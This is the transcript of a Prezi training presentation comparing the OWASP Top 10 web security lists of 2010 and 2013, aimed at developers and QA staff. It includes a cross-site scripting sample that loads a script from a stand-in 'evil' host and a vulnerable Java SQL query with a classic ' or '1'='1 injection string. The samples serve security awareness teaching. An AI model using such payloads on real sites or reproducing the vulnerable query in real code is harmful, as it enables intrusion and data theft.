Loading presentation...

Present Remotely

Send the link below via email or IM

Copy

Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.

DeleteCancel

Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

OWASP from 2010 to 2013

No description
by

Phil Patrick

on 25 July 2016

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of OWASP from 2010 to 2013

OWASP Top 10 - 2013
2013 (new)
2010 (old)
A1 - Injection
What changed from 2010?
A2 - Cross-Site Scripting (XSS)
A3 - Broken Authentication / Session Management
A4 - Insecure Direct Object Reference (IDOR)
A5 - Cross-Site Request Forgery (CSRF)
A6 - Security Misconfiguration
A7 - Insecure Cryptographic Storage
A8 - Failure to Restrict URL Access
A9 - Insufficient Transport Layer Protection
A10 - Unvalidated Redirects and Forwards
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Known Vulnerable Components
A10 - Unvalidated Redirects and Forwards
These swapped positions in severity.
moved up one spot (A6 to A5)
Merged into a new category; formerly from A7: Insecure Cryptographic Storage & A9: Insufficient Transport Layer Protection.
Used to be "Failure to Restrict URL Access"
Dropped 3 spots from 2010.
Originally was include within A5: Security Misconfiguration
(+1)
(+2)
(-)
(-3)
(-)
What is the OWASP!?
First came online in 2001 and has grown since then.
A standard for measuring the security of web applications.
Anyone can contribute.
Hundreds of open source projects
Free application security tutorials
My firefox Collection: http://bit.ly/X6bwd3
For Developers & even you, QA!
Examples:
Top 2 most common vulnerabilities we've seen/worked so far:
OWASP App Sec Tutorial Series: http://bit.ly/ZEsnT2
If you are really curious, check out the testing guide: http://bit.ly/ZEvASk
A1: Injection
A3: Cross-Site Scripting (XSS)
Implications of code vulnerable to XSS?
remote attacks;
redirects to attacker-controlled sites hosting malicious files
<A HREF="http://phils-trusted-site.org/<SCRIPT SRC='http://phils-evil-site.org/swetha-is-evil.js'></SCRIPT>"> Go to phils-trusted-site.org</A>
Identity theft (loss of confidentiality)
system compromise
...and many MORE! (unfortunately)
Any questions!?
Annual training complete!
OWASP 2010 Top 10
OWASP Top 10 2013 (RC1)
A5 - Security Misconfiguration
A2 - Broken Authentication / Session Management
A1 - Injection
A4 - Insecure Direct Object Reference (IDOR)
A3 - Cross-Site Scripting (XSS)
(-)
(-1)
(+1)
(-)
(-)
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";
in the URL-> id=' or '1'='1
http://phils-awesome-app.com/app/accountView?id=' or '1'='1
My handouts show my general methodolgies and approaches.
Who am I?
Full transcript